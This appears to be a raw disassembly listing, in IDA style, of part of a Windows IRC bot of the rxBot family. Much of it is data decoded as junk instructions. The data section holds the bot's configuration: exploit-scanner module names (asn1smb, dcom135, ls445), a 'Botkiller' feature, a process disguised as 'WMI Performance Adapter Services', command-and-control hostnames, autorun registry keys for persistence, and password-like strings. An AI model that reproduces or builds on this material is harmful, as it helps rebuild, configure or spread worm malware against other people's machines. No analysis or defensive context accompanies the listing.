; ---------------------------------------------------------------------------
dd 23B0000h
db 53h, 65h, 6Eh
; ---------------------------------------------------------------------------
loc_41D503: ; CODE XREF: .text:loc_41D49C�j
db 64h
dec ebp
db 65h
jnb short loc_41D57B
popa
loc_41D509: ; CODE XREF: .text:loc_41D4A0�j
db 67h, 65h
inc ecx
; ---------------------------------------------------------------------------
db 0
; ---------------------------------------------------------------------------
loc_41D50D: ; CODE XREF: .text:0041D4A2�j
add bl, ah
add [esi+69h], al
outsb
db 64h
push edi
imul ebp, [esi+64h], 41776Fh
fadd dword ptr [edx]
ja short loc_41D593
loc_41D520: ; CODE XREF: .text:loc_41D4B5�j
jo short loc_41D594
imul ebp, [esi+74h], 55004166h
push ebx
inc ebp
push edx
xor esi, [edx]
db 2Eh, 64h
insb
insb
; ---------------------------------------------------------------------------
word_41D532 dw 0 ; CODE XREF: .text:0041D4C7�j
; ---------------------------------------------------------------------------
enter 5201h, 65h
db 67h
inc ebx
loc_41D53A: ; CODE XREF: .text:0041D4CF�j
insb
outsd
jnb short loc_41D5A3
dec ebx
db 65h
jns short $+3
rol dword ptr [ecx], 1
loc_41D544: ; CODE XREF: .text:0041D4D4�j
push edx
loc_41D545: ; CODE XREF: .text:loc_41D4DD�j
db 65h, 67h
inc esp
db 65h
insb
loc_41D54A: ; CODE XREF: .text:loc_41D4E1�j
db 65h
jz short loc_41D5B2
push esi
loc_41D54E: ; CODE XREF: .text:loc_41D4E3�j
popa
insb
jnz short loc_41D5B7
inc ecx
add al, bh
add [edx+65h], edx
db 67h
push ebx
db 65h
jz short near ptr loc_41D5B2+1
popa
insb
jnz short loc_41D5C6
inc ebp
js short loc_41D5A5
; ---------------------------------------------------------------------------
dd 1CC0000h, 43676552h, 74616572h, 79654B65h, 417845h
; ---------------------------------------------------------------------------
and [ecx], eax
inc edi
loc_41D57B: ; CODE XREF: .text:0041D505�j
db 65h
jz short near ptr loc_41D5D1+2
jnb short loc_41D5E5
jb short near ptr loc_41D5CF+1
popa
insd
db 65h
inc ecx
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
jmp short loc_41D58B
; ---------------------------------------------------------------------------
push edx
loc_41D58B: ; CODE XREF: .text:0041D588�j
db 65h, 67h
push ecx
jnz short near ptr loc_41D5EE+7
jb short near ptr loc_41D604+7
push esi
loc_41D593: ; CODE XREF: .text:0041D51E�j
popa
loc_41D594: ; CODE XREF: .text:loc_41D520�j
insb
jnz short loc_41D5FC
inc ebp
js short near ptr loc_41D5DA+1
; ---------------------------------------------------------------------------
dw 0
dd 655201E1h
db 67h, 4Fh, 70h
; ---------------------------------------------------------------------------
loc_41D5A3: ; CODE XREF: .text:0041D53C�j
outs dx, byte ptr gs:[esi]
loc_41D5A5: ; CODE XREF: .text:0041D562�j
dec ebx
db 65h
jns short loc_41D5EE
js short loc_41D5EC
add [ecx+44h], al
push esi
inc ecx
push eax
dec ecx
loc_41D5B2: ; CODE XREF: .text:loc_41D54A�j
; .text:0041D55A�j
xor esi, [edx]
db 2Eh, 64h
insb
loc_41D5B7: ; CODE XREF: .text:0041D550�j
insb
; ---------------------------------------------------------------------------
dd 980000h, 6C656853h, 6578456Ch
db 63h, 75h
; ---------------------------------------------------------------------------
loc_41D5C6: ; CODE XREF: .text:0041D55F�j
jz short loc_41D62D
inc ecx
add [ebx+48h], dl
inc ebp
dec esp
dec esp
loc_41D5CF: ; CODE XREF: .text:0041D580�j
xor esi, [edx]
loc_41D5D1: ; CODE XREF: .text:loc_41D57B�j
db 2Eh, 64h
insb
insb
add [edx], cl
add [esi+65h], dl
loc_41D5DA: ; CODE XREF: .text:0041D598�j
jb short loc_41D62D
jnz short loc_41D643
jb short near ptr loc_41D655+4
push esi
popa
insb
jnz short near ptr loc_41D646+4
loc_41D5E5: ; CODE XREF: .text:0041D57E�j
inc ecx
; ---------------------------------------------------------------------------
dw 0
dd 65470000h
; ---------------------------------------------------------------------------
loc_41D5EC: ; CODE XREF: .text:0041D5A9�j
jz short loc_41D634
loc_41D5EE: ; CODE XREF: .text:0041D5A6�j
; .text:0041D58E�j
imul ebp, [ebp+56h], 69737265h
outsd
outsb
dec ecx
outsb
outsw
loc_41D5FC: ; CODE XREF: .text:0041D595�j
inc ecx
add [ecx], al
add [edi+65h], al
jz short near ptr loc_41D646+4
loc_41D604: ; CODE XREF: .text:0041D590�j
imul ebp, [ebp+56h], 69737265h
outsd
outsb
dec ecx
outsb
outsw
push ebx
imul edi, [edx+65h], 45560041h
push edx
push ebx
dec ecx
dec edi
dec esi
db 2Eh, 64h
insb
insb
add ch, dh
add [eax+65h], ecx
popa
jo short near ptr loc_41D670+1
jb short near ptr loc_41D68F+3
loc_41D62D: ; CODE XREF: .text:loc_41D5C6�j
; .text:loc_41D5DA�j
add gs:[eax], al
out dx, eax
add [eax+65h], ecx
loc_41D634: ; CODE XREF: .text:loc_41D5EC�j
popa
jo short near ptr loc_41D677+1
insb
insb
outsd
arpl [eax], ax
mov cl, 2
push edx
jz short near ptr loc_41D6A6+7
push ebp
outsb
loc_41D643: ; CODE XREF: .text:0041D5DC�j
ja short loc_41D6AE
outsb
loc_41D646: ; CODE XREF: .text:0041D5E3�j
; .text:0041D602�j
add fs:[ebx+69615202h], al
jnb short loc_41D6B4
inc ebp
js short loc_41D6B5
db 65h
jo short near ptr loc_41D6C8+1
loc_41D655: ; CODE XREF: .text:0041D5DE�j
imul ebp, [edi+6Eh], 19C0000h
inc edi
db 65h
jz short near ptr loc_41D6B1+2
jz short loc_41D6C3
jb short near ptr loc_41D6D7+1
jnz short near ptr loc_41D6D5+1
dec ecx
outsb
outsw
inc ecx
add ch, bh
add [edi+65h], al
loc_41D670: ; CODE XREF: .text:0041D629�j
jz short loc_41D6B5
outsd
insd
insd
popa
outsb
loc_41D677: ; CODE XREF: .text:0041D635�j
db 64h
dec esp
imul ebp, [esi+65h], 2FA0041h
push ebx
db 65h
jz short loc_41D6CC
popa
outsb
db 64h
insb
db 65h
inc ebx
outsd
jnz short near ptr loc_41D6F8+3
jz short $+2
loc_41D68F: ; CODE XREF: .text:0041D62B�j
add [esi+74654701h], bl
push ebx
jz short loc_41D6FC
dec eax
popa
outsb
db 64h
insb
add gs:[eax], al
push eax
add [edi+65h], eax
jz short loc_41D6EC
loc_41D6A6: ; CODE XREF: .text:0041D63F�j
imul ebp, [ebp+54h], 657079h
loc_41D6AE: ; CODE XREF: .text:loc_41D643�j
jmp short $+2
inc edi
loc_41D6B1: ; CODE XREF: .text:0041D65D�j
db 65h
jz short loc_41D6F5
loc_41D6B4: ; CODE XREF: .text:0041D64D�j
inc ebx
loc_41D6B5: ; CODE XREF: .text:0041D650�j
; .text:loc_41D670�j
push eax
; ---------------------------------------------------------------------------
dw 0
dd 6547017Ch, 4D454F74h
db 43h, 50h, 0
; ---------------------------------------------------------------------------
loc_41D6C3: ; CODE XREF: .text:0041D660�j
add cl, dh
add [edi+65h], al
loc_41D6C8: ; CODE XREF: .text:0041D652�j
jz short near ptr loc_41D70B+2
push eax
dec ecx
loc_41D6CC: ; CODE XREF: .text:0041D681�j
outsb
outsw
add bl, dh
add [eax+65h], ecx
popa
loc_41D6D5: ; CODE XREF: .text:0041D664�j
jo short loc_41D71B
loc_41D6D7: ; CODE XREF: .text:0041D662�j
db 65h
jnb short near ptr loc_41D74C+2
jb short near ptr loc_41D74A+1
jns short $+2
icebp
add [eax+65h], ecx
popa
jo short near ptr loc_41D727+1
jb short loc_41D74C
popa
jz short loc_41D74F
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
loc_41D6EC: ; CODE XREF: .text:0041D6A4�j
pop eax
add edx, [esi+69h]
jb short near ptr loc_41D765+1
jnz short near ptr loc_41D754+1
insb
loc_41D6F5: ; CODE XREF: .text:loc_41D6B1�j
inc esi
jb short near ptr loc_41D758+5
loc_41D6F8: ; CODE XREF: .text:0041D68B�j
add gs:[ebp+3], dl
loc_41D6FC: ; CODE XREF: .text:0041D696�j
push esi
imul esi, [edx+74h], 416C6175h
insb
insb
outsd
arpl [eax], ax
add cl, bh
loc_41D70B: ; CODE XREF: .text:loc_41D6C8�j
add [eax+65h], ecx
popa
jo short near ptr loc_41D762+1
db 65h
inc ecx
insb
insb
outsd
arpl [eax], ax
adc al, 2
dec ecx
loc_41D71B: ; CODE XREF: .text:loc_41D6D5�j
jnb short loc_41D75F
popa
db 64h
push edi
jb short near ptr loc_41D78A+1
jz short near ptr loc_41D788+1
push eax
jz short loc_41D799
loc_41D727: ; CODE XREF: .text:0041D6E3�j
add [eax], ah
add cl, [ebx+eax*2+4Dh]
popa
jo short near ptr loc_41D780+3
jz short loc_41D7A4
imul ebp, [esi+67h], 69000041h
add edx, [edi+69h]
db 64h, 65h
inc ebx
push 6F547261h
dec ebp
jnz short loc_41D7B3
jz short near ptr loc_41D7AC+6
inc edx
loc_41D74A: ; CODE XREF: .text:0041D6DA�j
jns short near ptr loc_41D7BF+1
loc_41D74C: ; CODE XREF: .text:0041D6E5�j
; .text:loc_41D6D7�j
add gs:[ecx], ah
loc_41D74F: ; CODE XREF: .text:0041D6E8�j
add cl, [ebx+eax*2+4Dh]
popa
loc_41D754: ; CODE XREF: .text:0041D6F2�j
jo short near ptr loc_41D7A8+1
jz short near ptr loc_41D7C5+5
loc_41D758: ; CODE XREF: .text:0041D6F6�j
imul ebp, [esi+67h], 1D000057h
loc_41D75F: ; CODE XREF: .text:loc_41D71B�j
add edx, [ebx+65h]
loc_41D762: ; CODE XREF: .text:0041D70F�j
jz short loc_41D7B9
outsb
loc_41D765: ; CODE XREF: .text:0041D6F0�j
push 6C646E61h
db 65h, 64h
inc ebp
js short loc_41D7D2
db 65h
jo short near ptr loc_41D7E5+1
imul ebp, [edi+6Eh], 746C6946h
db 65h
jb short $+3
inc edx
add edx, [ebp+6Eh]
loc_41D780: ; CODE XREF: .text:0041D72E�j
push 6C646E61h
db 65h, 64h
inc ebp
loc_41D788: ; CODE XREF: .text:0041D722�j
js short loc_41D7ED
loc_41D78A: ; CODE XREF: .text:0041D720�j
db 65h
jo short loc_41D801
imul ebp, [edi+6Eh], 746C6946h
db 65h
jb short $+3
add bl, ah
loc_41D799: ; CODE XREF: .text:0041D725�j
add [esi+72h], al
db 65h, 65h
inc ebp
outsb
jbe short near ptr loc_41D80A+1
jb short loc_41D813
loc_41D7A4: ; CODE XREF: .text:0041D730�j
outsb
insd
outs dx, byte ptr gs:[esi]
loc_41D7A8: ; CODE XREF: .text:loc_41D754�j
jz short near ptr loc_41D7F7+6
jz short loc_41D81E
loc_41D7AC: ; CODE XREF: .text:0041D747�j
imul ebp, [esi+67h], 3F004173h
loc_41D7B3: ; CODE XREF: .text:0041D745�j
add [edi+65h], eax
jz short near ptr loc_41D7F7+6
outsb
loc_41D7B9: ; CODE XREF: .text:loc_41D762�j
jbe short loc_41D824
jb short loc_41D82C
outsb
insd
loc_41D7BF: ; CODE XREF: .text:loc_41D74A�j
outs dx, byte ptr gs:[esi]
jz short loc_41D816
jz short loc_41D837
loc_41D7C5: ; CODE XREF: .text:0041D756�j
imul ebp, [esi+67h], 0E40073h
inc esi
jb short near ptr loc_41D833+1
db 65h
inc ebp
outsb
loc_41D7D2: ; CODE XREF: .text:0041D76D�j
jbe short near ptr loc_41D837+6
jb short loc_41D845
outsb
insd
outs dx, byte ptr gs:[esi]
jz short loc_41D82F
jz short near ptr loc_41D84B+5
imul ebp, [esi+67h], 41005773h
loc_41D7E5: ; CODE XREF: .text:0041D76F�j
add [edi+65h], eax
jz short loc_41D82F
outsb
jbe short loc_41D856
loc_41D7ED: ; CODE XREF: .text:loc_41D788�j
jb short near ptr loc_41D858+6
outsb
insd
outs dx, byte ptr gs:[esi]
jz short loc_41D848
jz short loc_41D869
loc_41D7F7: ; CODE XREF: .text:loc_41D7A8�j
; .text:0041D7B6�j
imul ebp, [esi+67h], 5773h
fild dword ptr [eax]
inc esi
loc_41D801: ; CODE XREF: .text:loc_41D78A�j
insb
jnz short loc_41D877
push 656C6946h
inc edx
loc_41D80A: ; CODE XREF: .text:0041D7A0�j
jnz short near ptr word_41D872
db 66h, 65h
jb short loc_41D883
; ---------------------------------------------------------------------------
db 2 dup(0), 5Bh
; ---------------------------------------------------------------------------
loc_41D813: ; CODE XREF: .text:0041D7A2�j
add edx, [esi+69h]
loc_41D816: ; CODE XREF: .text:0041D7C1�j
jb short loc_41D88C
jnz short loc_41D87B
insb
push eax
jb short near ptr loc_41D88C+1
loc_41D81E: ; CODE XREF: .text:0041D7AA�j
jz short near ptr loc_41D884+1
arpl [eax+eax+0], si
loc_41D824: ; CODE XREF: .text:loc_41D7B9�j
test al, 1
inc edi
db 65h
jz short near ptr loc_41D87C+1
jns short near ptr loc_41D89B+4
loc_41D82C: ; CODE XREF: .text:0041D7BB�j
jz short near ptr loc_41D891+2
insd
loc_41D82F: ; CODE XREF: .text:0041D7DA�j
; .text:0041D7E8�j
dec ecx
outsb
outsw
loc_41D833: ; CODE XREF: .text:0041D7CD�j
add [ebp+3], bl
push esi
loc_41D837: ; CODE XREF: .text:0041D7C3�j
; .text:loc_41D7D2�j
imul esi, [edx+74h], 516C6175h
jnz short loc_41D8A5
jb short near ptr loc_41D8BA+1
; ---------------------------------------------------------------------------
dw 0
; ---------------------------------------------------------------------------
sti
loc_41D845: ; CODE XREF: .text:0041D7D4�j
add [eax+65h], ecx
loc_41D848: ; CODE XREF: .text:0041D7F3�j
popa
jo short near ptr loc_41D89B+3
loc_41D84B: ; CODE XREF: .text:0041D7DC�j
imul edi, [edx+65h], 19F0000h
inc edi
db 65h
jz short near ptr loc_41D8A8+1
loc_41D856: ; CODE XREF: .text:0041D7EB�j
jz short near ptr loc_41D8C9+1
loc_41D858: ; CODE XREF: .text:loc_41D7ED�j
imul ebp, [esi+67h], 65707954h
inc ecx
; ---------------------------------------------------------------------------
dd 1A20000h, 53746547h
db 74h
; ---------------------------------------------------------------------------
loc_41D869: ; CODE XREF: .text:0041D7F5�j
jb short loc_41D8D4
outsb
db 67h
push esp
jns short near ptr loc_41D8DF+1
db 65h
push edi
; ---------------------------------------------------------------------------
word_41D872 dw 0 ; CODE XREF: .text:loc_41D80A�j
db 7Eh, 2, 51h
; ---------------------------------------------------------------------------
loc_41D877: ; CODE XREF: .text:0041D802�j
jnz short loc_41D8DE
jb short loc_41D8F4
loc_41D87B: ; CODE XREF: .text:0041D818�j
push eax
loc_41D87C: ; CODE XREF: .text:0041D827�j
db 65h
jb short near ptr loc_41D8E4+1
outsd
jb short loc_41D8EF
popa
loc_41D883: ; CODE XREF: .text:0041D80C�j
outsb
loc_41D884: ; CODE XREF: .text:loc_41D81E�j
arpl [ebp+43h], sp
outsd
jnz short near ptr loc_41D8F7+1
jz short near ptr loc_41D8EF+2
loc_41D88C: ; CODE XREF: .text:loc_41D816�j
; .text:0041D81C�j
jb short $+2
xor al, [ecx]
inc edi
loc_41D891: ; CODE XREF: .text:loc_41D82C�j
db 65h
jz short near ptr loc_41D8D6+1
jnz short near ptr dword_41D908
jb short near ptr loc_41D8F9+4
outsb
jz short loc_41D8EF
loc_41D89B: ; CODE XREF: .text:0041D849�j
; .text:0041D82A�j
push 64616572h
dec ecx
add fs:[eax], al
lodsb
loc_41D8A5: ; CODE XREF: .text:0041D83E�j
add [edi+65h], eax
loc_41D8A8: ; CODE XREF: .text:0041D853�j
jz short near ptr loc_41D8F9+4
jns short near ptr byte_41D91F
jz short near ptr byte_41D913
insd
push esp
imul ebp, [ebp+65h], 69467341h
insb
db 65h
push esp
loc_41D8BA: ; CODE XREF: .text:0041D840�j
imul ebp, [ebp+65h], 53030C00h
db 65h
jz short near ptr byte_41D917
jz short near ptr word_41D92A
dec eax
popa
outsb
loc_41D8C9: ; CODE XREF: .text:loc_41D856�j
db 64h
insb
add gs:[eax], al
adc [edx], eax
dec ecx
jnb short near ptr byte_41D915
popa
loc_41D8D4: ; CODE XREF: .text:loc_41D869�j
db 64h
push edx
loc_41D8D6: ; CODE XREF: .text:loc_41D891�j
db 65h
popa
db 64h
push eax
jz short near ptr word_41D94E
; ---------------------------------------------------------------------------
db 2 dup(0)
; ---------------------------------------------------------------------------
loc_41D8DE: ; CODE XREF: .text:loc_41D877�j
push cs
loc_41D8DF: ; CODE XREF: .text:0041D86E�j
add cl, [ecx+73h]
inc edx
popa
loc_41D8E4: ; CODE XREF: .text:loc_41D87C�j
db 64h
inc ebx
outsd
db 64h, 65h
push eax
jz short near ptr word_41D95E
; ---------------------------------------------------------------------------
db 2 dup(0), 0E8h
; ---------------------------------------------------------------------------
loc_41D8EF: ; CODE XREF: .text:0041D880�j
; .text:0041D899�j ...
add dl, [ebx+65h]
jz short near ptr byte_41D939
loc_41D8F4: ; CODE XREF: .text:0041D879�j
outsb
db 64h
dec edi
loc_41D8F7: ; CODE XREF: .text:0041D888�j
inc si
loc_41D8F9: ; CODE XREF: .text:0041D896�j
; .text:loc_41D8A8�j
imul ebp, [ebp+0], 0
; ---------------------------------------------------------------------------
db 3 dup(0)
align 8
dword_41D908 dd 2 dup(0) ; CODE XREF: .text:0041D894�j
db 3 dup(0)
byte_41D913 db 0 ; CODE XREF: .text:0041D8AC�j
db 0
byte_41D915 db 2 dup(0) ; CODE XREF: .text:0041D8D1�j
byte_41D917 db 0 ; CODE XREF: .text:0041D8C1�j
dd 0
db 3 dup(0)
byte_41D91F db 0 ; CODE XREF: .text:0041D8AA�j
dd 2 dup(0)
db 2 dup(0)
word_41D92A dw 0 ; CODE XREF: .text:0041D8C4�j
dd 3 dup(0)
db 0
byte_41D939 db 3 dup(0) ; CODE XREF: .text:0041D8F2�j
dd 4 dup(0)
db 2 dup(0)
word_41D94E dw 0 ; CODE XREF: .text:0041D8DA�j
dd 3 dup(0)
db 2 dup(0)
word_41D95E dw 0 ; CODE XREF: .text:0041D8EA�j
dd 1A8h dup(0)
dword_41E000 dd 0 ; DATA XREF: sub_40DD0D+70�o
dd offset sub_4152E6
dd offset sub_418041
dword_41E00C dd 0 ; DATA XREF: sub_40DD0D+77�o
dword_41E010 dd 0 ; DATA XREF: sub_40DD0D+3D�o
dd offset sub_40DABB
dd offset sub_41158A
dd offset sub_411A10
dd offset sub_414253
dd offset sub_4143C1
dword_41E028 dd 0 ; DATA XREF: sub_40DD0D+42�o
dword_41E02C dd 0 ; DATA XREF: sub_40DDA2:loc_40DE09�o
dd offset sub_40DB61
dword_41E034 dd 0 ; DATA XREF: sub_40DDA2+6C�o
dword_41E038 dd 0 ; CODE XREF: sub_40DD0D+23�p
; DATA XREF: sub_40DDA2:loc_40DE28�o
dd offset sub_4143D4
dword_41E040 dd 4 dup(0) ; DATA XREF: sub_40DDA2+8B�o
dd 78h, 0
dword_41E058 dd 80000002h ; DATA XREF: start+27�r
off_41E05C dd offset byte_41E1BC ; DATA XREF: start+21�r
dd 80000002h, 41E1ECh, 80000002h, 41E224h, 80000002h, 41E23Ch
dd 80000001h, 41E1BCh, 80000001h, 41E1ECh, 80000001h, 41E224h
dd 80000001h, 41E23Ch, 419298h
off_41E09C dd offset aAsn1smb ; DATA XREF: sub_401179+9E�r
; sub_401179+A8�o
; "asn1smb"
dd offset aR_x_b_o_t ; "R.X.B.o.t"
dd offset aDcom135 ; "dcom135"
dd offset aR_x_b_o_t ; "R.X.B.o.t"
dd offset aSDScanThreadDS ; "%s:%d, Scan thread: %d, Sub-thread: %d."...
dd 2 dup(0)
dd offset aFound ; "Found"
off_41E0BC dd offset aTooManySpecifi ; DATA XREF: sub_4013E5+9C�r
; sub_4013E5+A6�o
; "Too many specified."
dd offset aFound ; "Found"
dd offset aBotkiller ; "Botkiller"
dd offset aFound ; "Found"
dd offset aFailedToStar_3 ; "Failed to start worker thread, error: <"...
dd offset aFound ; "Found"
dd offset aSDScanThreadDS ; "%s:%d, Scan thread: %d, Sub-thread: %d."...
align 10h
byte_41E0E0 db 43h ; DATA XREF: sub_40198E+81C�r
; sub_40198E+824�o
db 6Dh, 74h, 63h
dd 726F4620h, 6E695720h, 2E3233h
aBawha db 'bawha',0 ; DATA XREF: sub_40198E+1269�o
; sub_40198E+22E1�o ...
align 4
aWmiapsrvs_exe db 'wmiapsrvs.exe',0 ; DATA XREF: sub_40198E+1264�o
; sub_404BAB+1C1�o ...
align 4
aWmiPerformance db 'WMI Performance Adapter Services',0 ; DATA XREF: start+D�o
; sub_40198E+125F�o ...
align 4
dword_41E12C dd 1 ; DATA XREF: sub_40198E+654�r
dword_41E130 dd 1 ; DATA XREF: sub_404901+14B�r
; sub_408EF0+4B8�w
dword_41E134 dd 1 ; DATA XREF: sub_404BAB+48F�r
; sub_408B66+C�r
byte_41E138 db 1 ; DATA XREF: sub_40198E+2CE�r
; sub_404901+EB�r
byte_41E139 db 2Eh ; DATA XREF: sub_405685:loc_405691�r
align 4
dword_41E13C dd 5 ; DATA XREF: sub_409C44+23�r
; .text:00409EB4�r ...
dword_41E140 dd 1 ; DATA XREF: sub_40198E+2D5�r
; sub_40198E+CA9�r ...
aCp_dawnsoul_in db 'cp.dawnsoul.info',0 ; DATA XREF: sub_404BAB+4E9�o
; sub_404BAB+590�o
align 4
byte_41E158 db 63h ; DATA XREF: sub_404BAB:loc_405179�r
; sub_404BAB+5DC�o
aP_dawnsoul_inf db 'p.dawnsoul.info',0
align 4
dword_41E16C dd 1DE6h ; DATA XREF: sub_404BAB+4F9�r
; sub_404BAB+59B�r
dword_41E170 dd 1DE6h ; DATA XREF: sub_404BAB+5E7�r
dd 7BDh
dword_41E178 dd 1F90h ; DATA XREF: sub_40198E:loc_402998�r
dword_41E17C dd 73734223h, 0 ; DATA XREF: sub_404BAB+503�o
; sub_404BAB+5A2�o ...
dword_41E184 dd 73734223h, 0 ; DATA XREF: sub_404BAB+5EE�o
dword_41E18C dd 2D734223h, 707865h ; DATA XREF: sub_40198E+1C0C�o
; sub_40198E+1C1D�o ...
dword_41E194 dd 2D734223h, 6E616Ch ; DATA XREF: sub_40198E+1916�o
; sub_40198E+27A2�o
dword_41E19C dd 2D734223h, 74696873h, 0 ; DATA XREF: sub_40198E+1702�o
dword_41E1A8 dd 2D734223h, 74696873h, 0 ; DATA XREF: sub_401073+B8�o
; sub_4013E5+C8�o ...
dword_41E1B4 dd 2D734223h, 434E56h ; DATA XREF: .text:0040D4CE�o
; .text:0040D5D7�o
byte_41E1BC db 53h ; DATA XREF: .text:off_41E05C�o
aOftwareMicroso db 'oftware\Microsoft\Windows\CurrentVersion\Run',0
align 4
db 53h
aOftwareMicro_0 db 'oftware\Microsoft\Windows\CurrentVersion\RunServices',0
align 4
db 53h
aOftwareMicro_1 db 'oftware\Microsoft\OLE',0
align 4
db 53h
aYstemCurrentco db 'YSTEM\CurrentControlSet\Control\Lsa',0
align 4
dword_41E264 dd 15h ; DATA XREF: sub_40198E+ECE�r
; sub_40198E+2DA9�w ...
aMs_microsoft_c db 'ms.microsoft.com',0 ; DATA XREF: sub_40198E+ED9�o
; sub_40198E+2D96�o ...
align 4
dd 3 dup(0)
aMircosoft db 'mircosoft',0 ; DATA XREF: sub_40198E+EC9�o
; sub_40198E+2DAF�o ...
align 4
dd 5 dup(0)
aPassword db 'password',0 ; DATA XREF: sub_40198E+EC4�o
; sub_40198E+2DBD�o ...
align 4
dd 5 dup(0)
aSvchost_exe db 'svchost.exe',0 ; DATA XREF: sub_40198E+EBF�o
; sub_40198E+2DCB�o ...
dd 5 dup(0)
aS_2: ; DATA XREF: sub_40198E+71C�o
; sub_40198E+895�o
unicode 0, <s>,0
aS_3: ; DATA XREF: sub_404BAB+519�o
; sub_404BAB+5B8�o ...
unicode 0, <s>,0
byte_41E2F0 db 77h ; DATA XREF: sub_40479E+28�r
; sub_40479E+30�o
aTfsondos12345 db 'tfsondos12345',0
align 10h
off_41E300 dd offset a@r00t ; DATA XREF: sub_406C24�r sub_406C24+B�o
; "*@r00t"
dd offset dword_419388
aAs445_0 db 'as445',0
align 10h
db 2 dup(0)
byte_41E312 db 1 ; DATA XREF: sub_40198E:loc_4032C0�r
; sub_40198E+1939�o
aLs445 db 'ls445',0
align 4
dd 79730100h, 6Dh, 0
dd 1, 2 dup(0)
dword_41E334 dd 10h ; DATA XREF: sub_40198E+937�r
; sub_40198E+963�r
byte_41E338 db 2Eh ; DATA XREF: sub_40198E+6BE�r
; sub_40198E+987�r ...
align 10h
byte_41E340 db 1 ; DATA XREF: sub_40557C+27�r
align 2
dw 2
dd 80004h, 200010h, 800040h
dword_41E350 dd 800000h, 400000h, 200000h, 100000h, 80000h, 40000h
; DATA XREF: sub_40557C+C2�r
; sub_40557C+D4�r
dd 20000h, 10000h, 8000h, 4000h, 2000h, 1000h, 800h, 400h
dd 200h, 100h, 80h, 40h, 20h, 10h, 8, 4, 2, 1
byte_41E3B0 db 38h ; DATA XREF: sub_40557C:loc_40558E�r
db 30h, 28h, 20h
dd 81018h, 21293139h, 1091119h, 222A323Ah, 20A121Ah, 232B333Bh
dd 262E363Eh, 60E161Eh, 252D353Dh, 50D151Dh, 242C343Ch
dd 40C141Ch, 30B131Bh
dword_41E3E8 dd 6040201h, 0E0C0A08h, 1513110Fh, 1C1B1917h, 170A100Dh
; DATA XREF: sub_40557C+66�r
dd 1B020400h, 914050Eh, 30B1216h, 60F0719h, 10C131Ah
dword_41E410 dd 241E3328h, 271D362Eh, 2F202C32h, 3726302Bh, 292D3421h
; DATA XREF: sub_40557C:loc_40562E�r
dd 1F1C2331h
dword_41E428 dd 1010400h, 0 ; DATA XREF: sub_405289+A6�r
; sub_405289+136�r
dd 10000h, 1010404h, 1010004h, 10404h, 4, 10000h, 400h
dd 1010400h, 1010404h, 400h, 1000404h, 1010004h, 1000000h
dd 4, 404h, 2 dup(1000400h), 2 dup(10400h), 2 dup(1010000h)
dd 1000404h, 10004h, 2 dup(1000004h), 10004h, 0
dd 404h, 10404h, 1000000h, 10000h, 1010404h, 4, 1010000h
dd 1010400h, 2 dup(1000000h), 400h, 1010004h, 10000h, 10400h
dd 1000004h, 400h, 4, 1000404h, 10404h, 1010404h, 10004h
dd 1010000h, 1000404h, 1000004h, 404h, 10404h, 1010400h
dd 404h, 2 dup(1000400h), 0
dd 10004h, 10400h, 0
dd 1010004h
dword_41E528 dd 80108020h ; DATA XREF: sub_405289+DF�r
; sub_405289+16F�r
dd 80008000h, 8000h, 108020h, 100000h, 20h, 80100020h
dd 80008020h, 80000020h, 80108020h, 80108000h, 80000000h
dd 80008000h, 100000h, 20h, 80100020h, 108000h, 100020h
dd 80008020h, 0
dd 80000000h, 8000h, 108020h, 80100000h, 100020h, 80000020h
dd 0
dd 108000h, 8020h, 80108000h, 80100000h, 8020h, 0
dd 108020h, 80100020h, 100000h, 80008020h, 80100000h, 80108000h
dd 8000h, 80100000h, 80008000h, 20h, 80108020h, 108020h
dd 20h, 8000h, 80000000h, 8020h, 80108000h, 100000h, 80000020h
dd 100020h, 80008020h, 80000020h, 100020h, 108000h, 0
dd 80008000h, 8020h, 80000000h, 80100020h, 80108020h, 108000h
dword_41E628 dd 208h ; DATA XREF: sub_405289+AD�r
; sub_405289+13D�r
dd 8020200h, 0
dd 8020008h, 8000200h, 0
dd 20208h, 8000200h, 20008h, 2 dup(8000008h), 20000h, 8020208h
dd 20008h, 8020000h, 208h, 8000000h, 8, 8020200h, 200h
dd 20200h, 8020000h, 8020008h, 20208h, 8000208h, 20200h
dd 20000h, 8000208h, 8, 8020208h, 200h, 8000000h, 8020200h
dd 8000000h, 20008h, 208h, 20000h, 8020200h, 8000200h
dd 0
dd 200h, 20008h, 8020208h, 8000200h, 8000008h, 200h, 0
dd 8020008h, 8000208h, 20000h, 8000000h, 8020208h, 8, 20208h
dd 20200h, 8000008h, 8020000h, 8000208h, 208h, 8020000h
dd 20208h, 8, 8020008h, 20200h
dword_41E728 dd 802001h ; DATA XREF: sub_405289+EE�r
; sub_405289+17E�r
dd 2 dup(2081h), 80h, 802080h, 800081h, 800001h, 2001h
dd 0
dd 2 dup(802000h), 802081h, 81h, 0
dd 800080h, 800001h, 1, 2000h, 800000h, 802001h, 80h, 800000h
dd 2001h, 2080h, 800081h, 1, 2080h, 800080h, 2000h, 802080h
dd 802081h, 81h, 800080h, 800001h, 802000h, 802081h, 81h
dd 2 dup(0)
dd 802000h, 2080h, 800080h, 800081h, 1, 802001h, 2 dup(2081h)
dd 80h, 802081h, 81h, 1, 2000h, 800001h, 2001h, 802080h
dd 800081h, 2001h, 2080h, 800000h, 802001h, 80h, 800000h
dd 2000h, 802080h
dword_41E828 dd 100h ; DATA XREF: sub_405289+BC�r
; sub_405289+14C�r
dd 2080100h, 2080000h, 42000100h, 80000h, 100h, 40000000h
dd 2080000h, 40080100h, 80000h, 2000100h, 40080100h, 42000100h
dd 42080000h, 80100h, 40000000h, 2000000h, 2 dup(40080000h)
dd 0
dd 40000100h, 2 dup(42080100h), 2000100h, 42080000h, 40000100h
dd 0
dd 42000000h, 2080100h, 2000000h, 42000000h, 80100h, 80000h
dd 42000100h, 100h, 2000000h, 40000000h, 2080000h, 42000100h
dd 40080100h, 2000100h, 40000000h, 42080000h, 2080100h
dd 40080100h, 100h, 2000000h, 42080000h, 42080100h, 80100h
dd 42000000h, 42080100h, 2080000h, 0
dd 40080000h, 42000000h, 80100h, 2000100h, 40000100h, 80000h
dd 0
dd 40080000h, 2080100h, 40000100h
dword_41E928 dd 20000010h ; DATA XREF: sub_405289+FD�r
; sub_405289+18D�r
dd 20400000h, 4000h, 20404010h, 20400000h, 10h, 20404010h
dd 400000h, 20004000h, 404010h, 400000h, 20000010h, 400010h
dd 20004000h, 20000000h, 4010h, 0
dd 400010h, 20004010h, 4000h, 404000h, 20004010h, 10h
dd 2 dup(20400010h), 0
dd offset loc_404010
